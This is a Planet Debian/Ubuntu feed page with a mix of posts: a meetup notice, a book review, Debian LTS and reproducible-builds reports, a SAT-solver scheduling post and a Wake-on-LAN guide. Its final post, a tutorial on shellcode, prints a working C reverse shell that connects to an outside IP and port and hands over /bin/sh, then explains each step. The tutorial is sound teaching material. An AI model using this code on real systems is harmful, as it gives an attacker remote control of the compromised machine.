
Feed aggregator

Montreal's Debian & Stuff - November 2018

Planet Debian - Thu, 01/11/2018 - 5:00am

November's wet, My socks are too, Away from keyboard; still on the net, Let's fix /usr/bin/$foo.

November can be a hard month in the Northern Hemisphere. It tends to be dark, rainy and cold. Montreal sure has been dark, rainy and cold lately.

That's why you should join us at our next Debian & Stuff later this month. Come by and work on Debian-related stuff - or not! Hanging out and chatting with folks is also perfectly fine. As always, everyone's welcome.

The date hasn't been decided yet, so be sure to fill out this poll before November 10th. This time we'll be hanging out at Koumbit.

What else can I say? If not for the good company, the bad poutine from the potato shack next door, or the nice craft beer from the very hipster beer shop a little further down the street, you should drop by to keep November from creeping in too far.

Louis-Philippe Véronneau https://veronneau.org/ Louis-Philippe Véronneau

Review: In Pursuit of the Traveling Salesman

Planet Debian - Thu, 01/11/2018 - 4:25am

Review: In Pursuit of the Traveling Salesman, by William J. Cook

Publisher: Princeton University
Copyright: 2012
ISBN: 0-691-15270-5
Format: Kindle
Pages: 272

In Pursuit of the Traveling Salesman is a book-length examination of the traveling salesman problem (TSP) in computer science, written by one of the foremost mathematicians working on solutions to the TSP. Cook is Professor of Applied Mathematics and Statistics at Johns Hopkins University and is one of the authors of the Concorde TSP Solver.

First, a brief summary of the TSP for readers without a CS background. While there are numerous variations, the traditional problem is this: given as input a list of coordinates on a two-dimensional map representing cities, construct a minimum-length path that visits each city exactly once and then returns to the starting city. It's famous in computer science in part because it's easy to explain and visualize but still NP-hard, which means that not only do we not know of a way to exactly solve this problem in a reasonable amount of time for large numbers of cities, but also that a polynomial-time solution to the TSP would provide a solution to a vast number of other problems. (For those familiar with computability theory, the classic TSP is not NP-complete because it's not a decision problem and because of some issues with Euclidean distances, but when stated as a graph problem and converted into a decision problem by, for example, instead asking if there is a solution with length less than n, it is NP-complete.)
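
To make the problem concrete, here is a tiny brute-force illustration (my own sketch, not anything from the book): it simply tries every ordering of the cities, which is exactly the factorial blow-up that makes exact solutions hopeless beyond a handful of cities.

    # A toy brute-force TSP solver; fine for 4 cities, hopeless for 40.
    from itertools import permutations
    from math import dist

    def shortest_tour(cities):
        start, *rest = cities
        return min(
            (sum(dist(a, b) for a, b in zip((start, *order), (*order, start))),
             (start, *order, start))
            for order in permutations(rest)
        )

    # Four corners of a 4x3 rectangle; the optimal tour is the perimeter, length 14.
    print(shortest_tour([(0, 0), (4, 0), (4, 3), (0, 3)]))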

This is one of those books where the quality of the book may not matter as much as its simple existence. If you're curious about the details of the traveling salesman problem specifically, but don't want to read a lot of mathematics and computer science papers, algorithm textbooks, or books on graph theory, this book is one of your few options. Thankfully, it's also fairly well-written. Cook provides a history of the problem, a set of motivating problems (the TSP doesn't come up as much and isn't as critical as some NP-complete problems, but optimal tours are still more common than one might think), and even a one-chapter tour of the TSP in art. The bulk of the book, though, is devoted to approximation methods, presented in roughly chronological order of development.

Given that the TSP is NP-hard, we obviously don't know a good exact solution, but I admit I was a bit disappointed that Cook spent only one chapter exploring the exact solutions and explaining to the reader what makes the problem difficult. Late in the book, he does describe the Held-Karp dynamic programming algorithm that gets the work required for an exact solution down to exponential in n, provides a basic introduction to complexity theory, and explains that the TSP is NP-complete by reduction from the Hamiltonian path problem, but doesn't show the reduction of 3SAT to Hamiltonian paths. Since my personal interest ran a bit more towards theory and less towards practical approximations, I would have appreciated a bit more discussion of the underlying structure of the problem and why it's algorithmically hard. (I did appreciate the explanation of why it's not clear whether the general Euclidean TSP is even in NP due to problems with square roots, though.)
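
As a rough sketch of the Held-Karp idea mentioned above (mine, not reproduced from the book): dynamic programming over subsets of cities brings the exact solution from factorial down to O(n² · 2ⁿ) time, at the price of exponential memory.

    # Held-Karp sketch: best[(S, j)] is the length of the shortest path that
    # starts at city 0, visits every city in S exactly once, and ends at j.
    # dist is a square matrix of pairwise distances.
    from itertools import combinations

    def held_karp(dist):
        n = len(dist)
        best = {(frozenset([j]), j): dist[0][j] for j in range(1, n)}
        for size in range(2, n):
            for S in map(frozenset, combinations(range(1, n), size)):
                for j in S:
                    best[(S, j)] = min(best[(S - {j}, k)] + dist[k][j]
                                       for k in S if k != j)
        full = frozenset(range(1, n))
        return min(best[(full, j)] + dist[j][0] for j in range(1, n))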

That said, I suppose there isn't as much to talk about in exact solutions (the best one we know dates to 1962) and much more to talk about in approximations, which is where Cook has personally spent his time. That's the topic of most of this book, and includes a solid introduction to the basic concept of linear programming (a better one than I ever got in school) and some of its other applications, as well as other techniques (cutting planes, branch-and-bound, and others). The math gets a bit thick here, and Cook skips over a lot of the details to try to keep the book suitable for a general audience, so I can't say I followed all of it, but it certainly satisfied my curiosity about practical approaches to the TSP. (It also made me want to read more about linear programming.)

If you're looking for a book like this, you probably know that already, and I can reassure you that it delivers what it promises and is well-written and approachable. If you aren't already curious about a brief history of practical algorithms for one specific problem, I don't think this book is sufficiently compelling to be worth seeking out anyway. This is not a general popularization of interesting algorithms (see Algorithms to Live By if you're looking for that), nor (despite Cook's efforts) is it particularly approachable if this is your first deep look at computer algorithms. It's a niche book that delivers on its promise, but probably won't convince you the topic is interesting if you don't see the appeal.

Rating: 7 out of 10

Russ Allbery https://www.eyrie.org/~eagle/ Eagle's Path

Debian LTS work, October 2018

Planet Debian - Wed, 31/10/2018 - 11:26pm

I was assigned 15 hours of work by Freexian's Debian LTS initiative and carried over 4 hours from September. I worked all 19 hours.

I released security updates for the linux (DLA 1529-1) and linux-4.9 (DLA 1531-1) packages. I prepared and released another stable update for Linux 3.16 (3.16.60), but have not yet included this in a Debian upload. I also released a security update for libssh (DLA 1548-1).

Ben Hutchings https://www.decadent.org.uk/ben/blog Better living through software

RHL'19 St-Cergue, Switzerland, 25-27 January 2019

Planet Debian - Wed, 31/10/2018 - 10:06pm

(translated from original French version)

The Rencontres Hivernales du Libre (RHL) (Winter Meeting of Freedom) takes place 25-27 January 2019 at St-Cergue.

Swisslinux.org invites the free software community to come and share workshops, great meals and good times.

This year, we celebrate the 5th edition with the theme «Exploit».

Please think creatively and submit proposals exploring this theme: lectures, workshops, performances and other activities are all welcome.

RHL'19 is situated directly at the base of some family-friendly ski pistes suitable for beginners and more adventurous skiers. It is also a great location for alpine walking trails.

Why, who?

RHL'19 brings together the forces of freedom in the Leman basin, Romandy, neighbouring France and further afield (there is an excellent train connection from Geneva airport). Hackers and activists come together to share a relaxing weekend and discover new things with free technology and software.

If you have a project to present (in 5 minutes, an hour or another format) or activities to share with other geeks, please send an email to rhl-team@lists.swisslinux.org or submit it through the form.

If you have any specific venue requirements please contact the team.

You can find detailed information on the event web site.

Please ask if you need help finding accommodation or any other advice planning your trip to the region.

Daniel.Pocock https://danielpocock.com/tags/debian DanielPocock.com - debian


Free software activities in October 2018

Planet Debian - Wed, 31/10/2018 - 4:47pm

Here is my monthly update covering what I have been doing in the free software world during October 2018 (previous month):


  • My activities as the current Debian Project Leader are covered in my monthly "Bits from the DPL" email to the debian-devel-announce mailing list.

  • I created GitHub-esque ribbons to display on Salsa-hosted websites. (Salsa is the collaborative development server for Debian and the replacement for the now-deprecated Alioth service.)

  • Started a highly work-in-progress "Debbugs Enhancement Suite" Chrome browser extension to enhance various parts of the bugs.debian.org web interface.

  • Even more hacking on the Lintian static analysis tool for Debian packages:

    • New features:

      • Warn about packages that use PIUPARTS_* in maintainer scripts. (#912040)
      • Check for packages that parse /etc/passwd in maintainer scripts. (#911157)
      • Emit a warning for packages that do not specify Build-Depends-Package in symbol files. (#911451)
      • Check for non-Python files in top-level Python module directories. [...]
      • Check packages missing versioned dependencies on init-system-helpers. (#910594)
      • Detect calls to update-inetd(1) that use --group without --add, etc. (#909511)
      • Check for packages that encode a Python version number in their source package name. [...]
    • Bug fixes:

    • Misc:

      • Also show the maintainer name on the tag-specific reporting HTML. [...]
      • Tidy a number of references regarding the debhelper-compat virtual package. [...]
Reproducible builds

Whilst anyone can inspect the source code of free software for malicious flaws, almost all software is distributed pre-compiled to end users.

The motivation behind the Reproducible Builds effort is to ensure no flaws have been introduced during this compilation process by promising identical results are always generated from a given source, thus allowing multiple third-parties to come to a consensus on whether a build was compromised.

This month:

  • I attended the Tandon School of Engineering (part of New York University) to speak and work with students from the Application Security course on the topic of reproducible builds.

  • Wrote and forwarded a patch for Fontconfig to ensure the cache filenames are deterministic. [...]

  • I sent two previously-authored patches for GNU mtools to ensure the Debian Installer images could become reproducible. (1 & 2)

  • Submitted 11 Debian patches to fix reproducibility issues in fast5, libhandy, lmfit-py, mp3fs, opari2, pjproject, radon, sword, syndie, wit & zsh-antigen. I also submitted an upstream pull request for python-changelog.

  • Made a large number of changes to our website, including adding step-by-step instructions and screenshots on how to sign up for our project on Salsa and migrating the TimestampsProposal page on the Debian Wiki to our website.

  • Fixed an issue in disorderfs — our FUSE-based filesystem that deliberately introduces non-determinism into directory system calls in order to flush out reproducibility issues — where touch -m and touch -a were not working as expected (#911281). In addition, ensured that failing an XFail test is in itself treated as a failure [...].

  • Made the following changes to diffoscope, our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues to:

    • Add support for comparing OCaml files via ocamlobjinfo. (#910542)

    • Add support for comparing PDF metadata using PyPDF2. (#911446)

    • Support gnumeric 1.12.43. [...]

    • Use str.startswith(...) over str.index(...) == 0 in the Macho comparator to prevent tracebacks if text cannot be found on the line. (#910540).

    • Add note on how to regenerate debian/tests/control.in and regenerate debian/tests/control with no material changes to add the regeneration comment itself. (1, 2)

    • Prevent test failures when running under stretch-backports by checking the OCaml version number. (#911846)

    • I also added a Salsa ribbon to the diffoscope.org website. [...]

  • Categorised a huge number of packages and issues in the Reproducible Builds "notes" repository and kept isdebianreproducibleyet.com up to date [...].

  • Worked on publishing our weekly reports. (#180, #181, #182 & #183)

  • Lastly, I fixed an issue in our Jenkins-based testing framework that powers tests.reproducible-builds.org to suppress some warnings from the cryptsetup initramfs hook which were causing some builds to be marked as "unstable". [...]


Debian


Debian bugs & patches filed
  • debbugs: Correct "favicon" location in <link/> HTML header. (#912186)

  • ikiwiki: "po" plugin can insert raw file contents with [[!inline]] directives. (#911356)

  • kitty: Please update homepage. (#911848)

  • pipenv: Bundles a large number of third-party libraries. (#910107)

  • mailman: Please include List-Id header on confirmation mails. (#910378)

  • fswatch: Clarify Files-Excluded entries. (#910330)

  • fuse3: Please obey nocheck build profile. (#910029)

  • gau2grid: Please add a non-boilerplate long description. (#911532)

  • hiredis: Please backport to stretch-backports. (#911732)

  • Please remove unnecessary overrides in fuse3 (#910030), puppet-module-barbican (#910374), python-oslo.vmware (#910011) & python3-antlr3 (#910012)

  • python3-pypdf2: Python 3.x package ships non-functional Python 2.x examples. (#911649)

  • mtools: New upstream release. (#912285)

I also filed requests with the stable release managers to update lastpass-cli (#911767) and python-django (#910821).


Debian LTS

This month I have worked 18 hours on Debian Long Term Support (LTS) and 12 hours on its sister Extended LTS project.

  • Multiple "frontdesk" shifts, triaging upstream CVEs, liaising with the Security Team, etc.

  • Issued DLA 1528-1 to prevent a denial-of-service (DoS) vulnerability in strongswan, a virtual private network (VPN) client and server where verification of an RSA signature with a very short public key caused an integer underflow in a length check that resulted in a heap buffer overflow.

  • Issued DLA 1547-1 for the Apache PDFBox library to fix a potential DoS issue where a malicious file could have triggered an extremely long running computation when parsing the PDF page tree.

  • Issued DLA 1550-1 for src:drupal7 to close remote code execution and an external URL injection exploit in the Drupal web-based content management framework as part of Drupal's SA-CORE-2018-006 security release.

  • Issued ELA-49-1 for the Adplug sound library to fix a potential DoS attack due to a double-free vulnerability.


Uploads
  • redis:

    • 5.0~rc5-2 — Use the Debian hiredis library now that #907259 has landed. (#907258)
    • 5.0.0-1 — New upstream release.
    • 5.0.0-2 — Update patch to sentinel.conf to ensure the correct runtime PID file location (#911407), listen on ::1 interfaces too for redis-sentinel to match redis-server, & run the new LOLWUT command in the autopkgtests.
  • python-django:

    • 1.11.16-1 — New upstream bugfix release.
    • 1.11.16-2 — Fix some broken README.txt symlinks. (#910120)
    • 1.11.16-3 — Default to supporting Spatialite 4.2. (#910240)
    • 2.1.2-1 — New upstream security release.
    • 2.1.2-2 — Default to supporting Spatialite 4.2. (#910240)
  • libfiu:

  • 0.96-5 — Apply patch from upstream to write fiu_ctrl.py atomically to avoid a parallel build failure. (#909843)

  • 0.97-1 — New upstream release.
  • 0.97-2 — Mangle return offset sizes for 64-bit variants to prevent build failures on 32-bit architectures. (#911733)

  • adminer (4.6.3-2) — Use continue 2 to avoid a switch/continue warning in PHP 7.3, thus preventing an autopkgtest regression. (#911825)

  • bfs (1.2.4-1) — New upstream release.

  • django-auto-one-to-one (3.1.1-1) — New upstream release.

  • lastpass-cli (1.3.1-5) — Add ca-certificates to Depends.

  • python-redis (2.10.6-5) — Fix debian/watch file.

  • python-daiquiri (1.5.0-1) — New upstream release.


I also sponsored uploads of elpy (1.25.0-1) and hiredis (0.14.0-1).

FTP Team


As a Debian FTP assistant I ACCEPTed 95 packages: barrier, cct, check-pgactivity, cloudkitty-dashboard, cmark-gfm, eclipse-emf, eclipse-jdt-core, eclipse-platform-team, eclipse-platform-ua, eclipse-platform-ui, eos-sdk, equinox-p2, fontcustom, fonts-fork-awesome, fswatch, fuse3, gau2grid, gitlab, glom, grapefruit, grub-cloud, gsequencer, haskell-base-compat-batteries, haskell-invariant, haskell-parsec-numbers, haskell-reinterpret-cast, haskell-resolv, haskell-shelly, haskell-skylighting-core, haskell-wcwidth, hollywood, intelhex, javapoet, libgpg-error, libjsoncpp, libnbcompat, lintian-brush, llvm-toolchain-snapshot, mando, mat2, mini-httpd-run, modsecurity, mtree-netbsd, neutron-tempest-plugin, ngspice, openstack-cluster-installer, pg-checksums, pg-cron, pg-dirtyread, pg-qualstats, pg-repack, pg-similarity, pg-stat-kcache, pgaudit, pgextwlist, pgfincore, pgl-ddl-deploy, pgmemcache, pgpool2, pgrouting, pgsql-ogr-fdw, pgstat, pipenv, postgresql-hll, postgresql-plproxy, postgresql-plsh, puppet-module-barbican, puppet-module-icann-quagga, puppet-module-icann-tea, puppet-module-rodjek-logrotate, pykwalify, pyocd, python-backports.csv, python-fastfunc, python-httptools, python-redmine, python-tld, python-yaswfp, python3-simpletal, r-cran-eaf, r-cran-emoa, r-cran-ggally, r-cran-irace, r-cran-parallelmap, r-cran-popepi, r-cran-pracma, r-cran-spp, radon, rust-semver-parser-0.7, syndie, unicycler, vitetris, volume-key, weston & zram-tools.

I additionally filed 14 RC bugs against packages that had potentially-incomplete debian/copyright files: fontcustom, fuse3, intelhex, libnbcompat, mat2, modsecurity, mtree-netbsd, puppet-module-barbican, python-redmine, r-cran-eaf, r-cran-emoa, r-cran-pracma, radon & syndie.

Chris Lamb https://chris-lamb.co.uk/blog/category/planet-debian lamby: Items or syndication on Planet Debian.

Lubuntu Blog: Disco Dingo: The development cycle has started!

Planet Ubuntu - Wed, 31/10/2018 - 4:16pm
The development cycle for the Disco Dingo (which will be the codename for the 19.04 release) has started for the Lubuntu team! Translated into: español UPDATE: Daily images are now up, and are available on our downloads page, for the adventurous. Also, an update to Perl 5.28 is being done prior to opening as well. […]

SAT solvers for fun and fairness

Planet Debian - Tue, 30/10/2018 - 10:55pm

Trøndisk 2018, the first round of the Norwegian ultimate series (the frisbee sport, not the fighting style) is coming up this weekend! Normally that would mean that I would blog something about all the new and exciting things we are doing with Nageru for the stream, but for now, I will just point out that the stream is on plastkast.no and will be live from 0945–1830 CET on Saturday (group stage) and 1020–1450 (playoffs) on Sunday.

Instead, I wanted to talk about a completely different but interesting subproblem we had to solve; how do you set up a good schedule for the group stages? There are twelve teams, pre-seeded and split into two groups (call them A0–A5 and B0–B5) that are to play round-robin, but there are only two fields—and only one of them is streamed. You want a setup that maximizes fairness in the sense that people get adequate rest between matches, and also more or less equal number of streamed games. Throw in that one normally wants the more exciting games last, and it starts to get really tricky to make something good by hand. Could we do it programmatically?

My first thought was that since this is all about the ordering, it sounded like a variant of the infamous travelling salesman problem. It's well-known that TSP is NP-hard (or NP-complete, but I won't bother with the details), but there are excellent heuristic implementations in practice. In particular, I had already used OR-Tools, Google's optimization toolkit, to solve TSP problems in the past; it contains a TSP solver that can deal with all sorts of extra details, like multiple agents to travel (in our case, multiple fields), subconstraints on ordering and so on. (OR-Tools probably doesn't contain the best TSP solver in the world—there are specialized packages that do even better—but it's much better than anything I could throw together myself.)

However, as I tried figuring out something, and couldn't quite get it to fit (there are so many extra nonlocal constraints), I saw that the OR-Tools documentation had a subsection on scheduling problems. It turns out this kind of scheduling can be represented as a so-called SAT (satisfiability) problem, and OR-Tools also has a SAT solver. (SAT, in its general forms, is also NP-hard, but again, there are great heuristics.) I chose the Python frontend, which probably wasn't the best idea in the world (it's poorly documented, and I do wonder when Python will take the step into the 90s and make spelling errors in variables into compile-time errors instead of throwing a runtime exception four hours into a calculation), but that's what the documentation used, and the backend is in C++ anyway, so speed doesn't matter.

The SAT solver works by declaring variables and various constraints between them, and then asking the machine to either come up with a solution that fits, or to prove that it's not possible. Let's have a look of some excerpts to get a feel for how it all works:

We know we have 15 rounds, two fields on each, and every field should contain a match. So let's generate 30 such variables, each containing a match number (we use the convention that match 0, 2, 4, 6, etc. are on the stream field and 1, 3, 5, 7, etc. are played in parallel on the other field):

matchnums = []
for match_idx in range(num_matches):
    matchnums.append(model.NewIntVar(0, num_matches - 1, "matchnum%d" % (match_idx)))

So this is 30 variables, and each goes from 0 to 29, inclusive. We start with a fairly obvious constraint; we can only play each match once:

model.AddAllDifferent(matchnums)

The SAT solver might make this into a bunch of special constraints underneath, or it might not. We don't care; it's abstracted away for us.

Now, it's not enough to just find any ordering—after all, we want to find an ordering with some constraints. However, the constraints are rarely about the match numbers, but more about the teams that play in those matches. So we'll need some helper variables. For instance, it would be interesting to know which teams play in each match:

home_teams = []
away_teams = []
for match_idx in range(num_matches):
    home_teams.append(model.NewIntVar(0, num_teams - 1, "home_team_match%i" % (match_idx)))
    away_teams.append(model.NewIntVar(0, num_teams - 1, "away_team_match%i" % (match_idx)))
    model.AddElement(matchnums[match_idx], home_teams_for_match_num, home_teams[match_idx])
    model.AddElement(matchnums[match_idx], away_teams_for_match_num, away_teams[match_idx])

AddElement() here simply is an indexing operation; since there's no difference between home and away teams for us, we've just pregenerated all the matches as A0 vs. A1, A0 vs. A2, etc. up until A3 vs. A5 and A4 vs. A5, and then similarly for the other group. The “element” constraint makes sure that e.g. home_team_match0 = home_teams_for_match_num[matchnum0]. Note that even though I think of this as an assignment where the home team for match 0 follows logically from which match is being played as match 0, it is a constraint that goes both ways; the solver is free to do inference that way, or instead first pick the home team and then deal with the consequences for the match number. (E.g., if it picks A4 as the home team, the match number most certainly needs to be 14, which corresponds to A4–A5.)

We're not quite done with the helpers yet; we want to explode these variables into booleans:

home_team_in_match_x_is_y = [[
    model.NewBoolVar('home_team_in_match_%d_is_%d' % (match_idx, team_idx))
    for team_idx in range(num_teams)
] for match_idx in range(num_matches)]

for match_idx in range(num_matches):
    model.AddMapDomain(matchnums[match_idx], match_x_has_num_y[match_idx])

and similarly for away team and match number.

So now we have a bunch of variables of the type “is the home team in match 6 A4 or not?”. Finally we can make some interesting constraints! For instance, we've decided already that the group finals (A0–A1 and B0–B1) should be the last two matches of the day, and on the stream field:

model.AddBoolOr([match_x_has_num_y[28][0], match_x_has_num_y[28][15]])
model.AddBoolOr([match_x_has_num_y[26][0], match_x_has_num_y[26][15]])

This is a hard constraint; we don't have a solution unless match 0 and match 15 are the last two (and we earlier said that they must be different).

We're going to need even more helper variables now. It's useful to know whether a team is playing at all in a given round; that's the case if they are the home or away team on either field:

plays_in_round = {}
for team_idx in range(num_teams):
    plays_in_round[team_idx] = {}
    for round_idx in range(num_rounds):
        plays_in_round[team_idx][round_idx] = model.NewBoolVar('plays_in_round_t%d_r%d' % (team_idx, round_idx))
        model.AddMaxEquality(plays_in_round[team_idx][round_idx], [
            home_team_in_match_x_is_y[round_idx * 2 + 0][team_idx],
            home_team_in_match_x_is_y[round_idx * 2 + 1][team_idx],
            away_team_in_match_x_is_y[round_idx * 2 + 0][team_idx],
            away_team_in_match_x_is_y[round_idx * 2 + 1][team_idx]])

Now we can establish a few other very desirable properties; in particular, each team should never need to play two matches back-to-back:

for round_idx in range(num_rounds - 1):
    for team_idx in range(num_teams):
        model.AddBoolOr([plays_in_round[team_idx][round_idx].Not(),
                         plays_in_round[team_idx][round_idx + 1].Not()])

Note that there's nothing here that says the same team can't be assigned to play on both fields at the same time! However, this is taken care of by some constraints on the scheduling that I'm not showing for brevity (in particular, we established that each round must have exactly one game from group A and one from group B).
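
(The author doesn't show that constraint; purely as a hedged guess at how it could be expressed with the variables above — assuming the convention that match numbers 0–14 are group A and 15–29 are group B — it might look something like this:)

    # Hypothetical sketch, not the author's code: require exactly one group-A
    # match per round; AddAllDifferent then forces the other slot to be group B.
    for round_idx in range(num_rounds):
        group_a_here = []
        for field in (0, 1):
            match_idx = round_idx * 2 + field
            group_a_here.extend(match_x_has_num_y[match_idx][m] for m in range(15))
        model.Add(sum(group_a_here) == 1)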

Now we're starting to get out of the “hard constraint” territory and more into things that would be nice. For this, we need objectives. One such objective is what I call “tiredness”; playing matches nearly back-to-back (i.e., game - rest - game) should have a penalty, and the solution should try to avoid it.

tired_matches = []
for round_idx in range(num_rounds - 2):
    for team_idx in range(num_teams):
        tired = model.NewBoolVar('team_%d_is_tired_in_round_%d' % (team_idx, round_idx))
        model.AddMinEquality(tired, [plays_in_round[team_idx][round_idx],
                                     plays_in_round[team_idx][round_idx + 2]])
        tired_matches.append(tired)

sum_tiredness = sum(tired_matches)

So here we have helper variables that are being set to the minimum (effectively a logical AND) of “do I play in round N” and “do I play in round N + 2”. Tiredness is simply a sum of those 0–1 variables, which we can seek to minimize:

model.Minimize(sum_tiredness)

You may wonder how we went from a satisfiability problem to an optimization problem. Conceptually, however, this isn't so hard. Just ask the solver to find any solution, e.g. something with sum_tiredness 20. Then simply add a new constraint saying sum_tiredness <= 19 and ask for a re-solve (or continue). Eventually, the solver will either come back with a better solution (in which case you can tighten the constraint further), or the message that you've asked for something impossible, in which case you know you have the optimal solution. (I have no idea whether modern SAT solvers actually work this way internally, but again, conceptually it's simple.)
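
As a minimal sketch of that idea (not the author's code; it assumes the model and the tired_matches list from above), the manual tighten-and-resolve loop could look like this:

    from ortools.sat.python import cp_model

    def solve_by_tightening(model, tired_matches):
        solver = cp_model.CpSolver()
        best = None
        while True:
            status = solver.Solve(model)
            if status not in (cp_model.FEASIBLE, cp_model.OPTIMAL):
                return best  # nothing better exists; the last solution was optimal
            best = sum(solver.Value(v) for v in tired_matches)
            # Demand a strictly better (lower) tiredness before re-solving.
            model.Add(sum(tired_matches) <= best - 1)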

As an extra bonus, you do get incrementally better solutions as you go. These problems are theoretically very hard—in fact, I let it run for fun for a week now, and it's still not found an optimal solution—and in practice, you just take some intermediate solution that is “good enough”. There are always constraints that you don't bother adding to the program anyway, so there's some eyeballing involved, but still feels like a more fair process than trying to nudge it by hand.

We had many more objectives, some of them contradictory (e.g., games between more closely seeded opponents are more “exciting”, and should be put last—but they should also be put on the stream, so do you put them early on the stream field or late on the non-stream field?). It's hard to weigh all the factors against each other, but in the end, I think we ended up with something pretty nice. Every team gets to play two or three times (out of five) on the stream, only one team needs to be “tired” twice (and I checked; if you ask for a hard maximum of once for every team, it comes back pretty fast as infeasible), many of the tight matches are scheduled near the end… and most importantly, we don't have to play the first matches while I'm still debugging the stream. :-)

You can see the final schedule here. Good luck to everyone, and consider using a SAT solver next time you have a thorny scheduling problem!

Steinar H. Gunderson http://blog.sesse.net/ Steinar H. Gunderson

Enabling Wake-on-Lan with the N34 Mini PC

Planet Debian - Tue, 30/10/2018 - 8:58pm

There is a room at the top of my house which was originally earmarked for storage (the loft is full of insulation rather than being a useful option). Then I remembered I still had my pico projector and it ended up as a cinema room as well. The pico projector needs really low light conditions with a long throw, so the fact the room only has a single small window is a plus.

I bought an “N34” mini PC to act as a media player - I already had a spare DVB-T2 stick to Freeview enable things, and the Kodi box downstairs has all my DVDs stored on it for easy streaming. It’s a Celeron N3450 based box with 4G RAM and a 32GB internal eMMC (though I’m currently running off an SD card because that’s what I initially used to set it up and I haven’t bothered to copy it onto the internal device yet). My device came from Amazon and is branded “Kodlix” (whose website no longer works) but it appears to be the same thing as the Beelink AP34.

Getting Linux onto it turned out to be a hassle. GRUB does not want to play with the EFI BIOS; it can be operated sometimes if manually called from the EFI Shell, but it does not work as the default EFI image to load. Various forum posts recommended the use of rEFInd, which mostly works fine.

Other than that Debian Stretch worked without problems. I had to pull in a backports kernel in order to make the DVB-T2 stick work properly, but the hardware on the N34 itself was all supported out of the box.

The other issue was trying to get Wake-on-Lan to work. The room isn’t used day to day so I want to be able to tie various pieces together with home automation such that I can have everything off by default and a scene configured to set things up ready for use. The BIOS has an entry for Wake-on-Lan, ethtool reported Supports Wake-on: g which should mean MagicPacket wakeup was enabled, but no joy. Looking at /proc/acpi/wakeup gave:

/proc/acpi/wakeup contents:

Device  S-state    Status       Sysfs node
HDAS      S3     *disabled      pci:0000:00:0e.0
XHC       S3     *enabled       pci:0000:00:15.0
XDCI      S4     *disabled
BRCM      S0     *disabled
RP01      S4     *disabled
PXSX      S4     *disabled
RP02      S4     *disabled
PXSX      S4     *disabled
RP03      S4     *disabled      pci:0000:00:13.0
PXSX      S4     *disabled      pci:0000:01:00.0
RP04      S4     *disabled
PXSX      S4     *disabled
RP05      S4     *disabled
PXSX      S4     *disabled
RP06      S4     *disabled      pci:0000:00:13.3
PXSX      S4     *disabled      pci:0000:02:00.0
PWRK      S4     *enabled       platform:PNP0C0C:00

pci:0000:01:00.0 is the network card:

01:00.0 Ethernet controller [0200]: Realtek […] Ethernet Controller [10ec:8168] (rev 0c)

I need this configured to allow wakeups which apparently is done via sysfs these days:

echo enabled > /sys/bus/pci/devices/0000\:01\:00.0/power/wakeup

This has to be done every boot so I just tied it into /etc/network/interfaces.

All of this then enables Home Assistant to control the Kodi box:

Home Assistant Kodi WoL configuration:

wake_on_lan:

media_player:
  - platform: kodi
    name: Kodi (Cinema)
    host: kodi-cinema.here
    port: 8000
    username: kodi
    password: !secret kodi_cinema_pass
    enable_websocket: false
    turn_on_action:
      service: wake_on_lan.send_magic_packet
      data:
        mac: 84:39:be:11:22:33
        broadcast_address: 192.168.0.2
    turn_off_action:
      service: media_player.kodi_call_method
      data:
        entity_id: media_player.kodi_cinema
        method: System.Shutdown

My Home Assistant container sits on a different subnet to the media box, and I found that the N34 wouldn’t respond to a Wake-on-Lan packet to the broadcast MAC address. So I’ve configured the broadcast_address for Home Assistant to be the actual IP of the media box, allowed UDP port 9 (discard) through on the firewall and statically nailed the ARP address of the media box on the router, so it transmits the packet with the correct destination MAC:

ip neigh change 192.168.0.2 lladdr 84:39:be:11:22:33 nud permanent dev eth0

I’ve still got some other bits to glue together (like putting the pico projector on a SonOff), but this gets me started on that process.

(And yes, the room is a bit cosier these days than when that photograph was taken.)

Jonathan McDowell https://www.earth.li/~noodles/blog/ Noodles' Emptiness

David Tomaschik: Understanding Shellcode: The Reverse Shell

Planet Ubuntu - Tue, 30/10/2018 - 8:00am

A recent conversation with a coworker inspired me to start putting together a series of blog posts to examine what it is that shellcode does. In the first installment, I’ll dissect the basic reverse shell.

First, a couple of reminders: shellcode is the machine code that is injected into the flow of a program as the result of an exploit. It generally must be position independent as you can’t usually control where it will be loaded in memory. A reverse shell initiates a TCP connection from the compromised host back to a host under the control of the attacker. It then launches a shell with which the attacker can interact.

Reverse Shell in C

Let’s examine a basic reverse shell in C. Error handling is elided, both for the space in this post, and because most shellcode is not going to have error handling.

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

void reverse_shell() {
  /* Allocate a socket for IPv4/TCP (1) */
  int sock = socket(AF_INET, SOCK_STREAM, 0);
  /* Setup the connection structure. (2) */
  struct sockaddr_in sin;
  sin.sin_family = AF_INET;
  sin.sin_port = htons(4444);
  /* Parse the IP address (3) */
  inet_pton(AF_INET, "192.168.22.33", &sin.sin_addr.s_addr);
  /* Connect to the remote host (4) */
  connect(sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in));
  /* Duplicate the socket to STDIO (5) */
  dup2(sock, STDIN_FILENO);
  dup2(sock, STDOUT_FILENO);
  dup2(sock, STDERR_FILENO);
  /* Setup and execute a shell. (6) */
  char *argv[] = {"/bin/sh", NULL};
  execve("/bin/sh", argv, NULL);
}

Reverse Shell Steps

As can be seen, there are approximately 6 steps in setting up a reverse shell. Once they are understood, this can be converted to proper shellcode.

  1. First we need to allocate a socket structure in the kernel with a call to socket. This is a wrapper for a system call (since it has effects in kernel space). On x86, this wraps a system call called socketcall, which is a single entry point for dispatching all socket-related system calls. On x86-64, the different socket system calls are actually distinct system calls, so this will call the socket system call. It needs to know the address family (AF_INET for IPv4) and the socket type (SOCK_STREAM for TCP, it would be SOCK_DGRAM for UDP). This returns an integer that is a file descriptor for the socket.
  2. Next, we need to setup a struct sockaddr_in, which includes the family (AF_INET again), and the port number in network byte order (big-endian).
  3. We also need to put the IP address into the structure. inet_pton can parse a string form into the struct. In a struct sockaddr_in, this is a 4 byte value, again in network byte order.
  4. We now have the full structure setup, so we can initiate a connection to the remote host using the already-created socket. This is done with a call to connect. Like socket, this is a wrapper for the socketcall system call on x86, and for a connect system call on x86-64.
  5. We want the shell to use our socket when it is handling standard input/output (stdio) functions. To do this, we duplicate the file descriptor from the socket to each of STDIN, STDOUT, STDERR. Like so many, dup2() is a thin wrapper around a system call.
  6. Finally, we setup the arguments for our shell, and launch it with execve, yet another system call. This one will replace the current binary image with the targeted binary (/bin/sh) and then execute it from the entry point. It will execute with its standard input, output, and error connected to the network socket.
Why not shellcode in C?

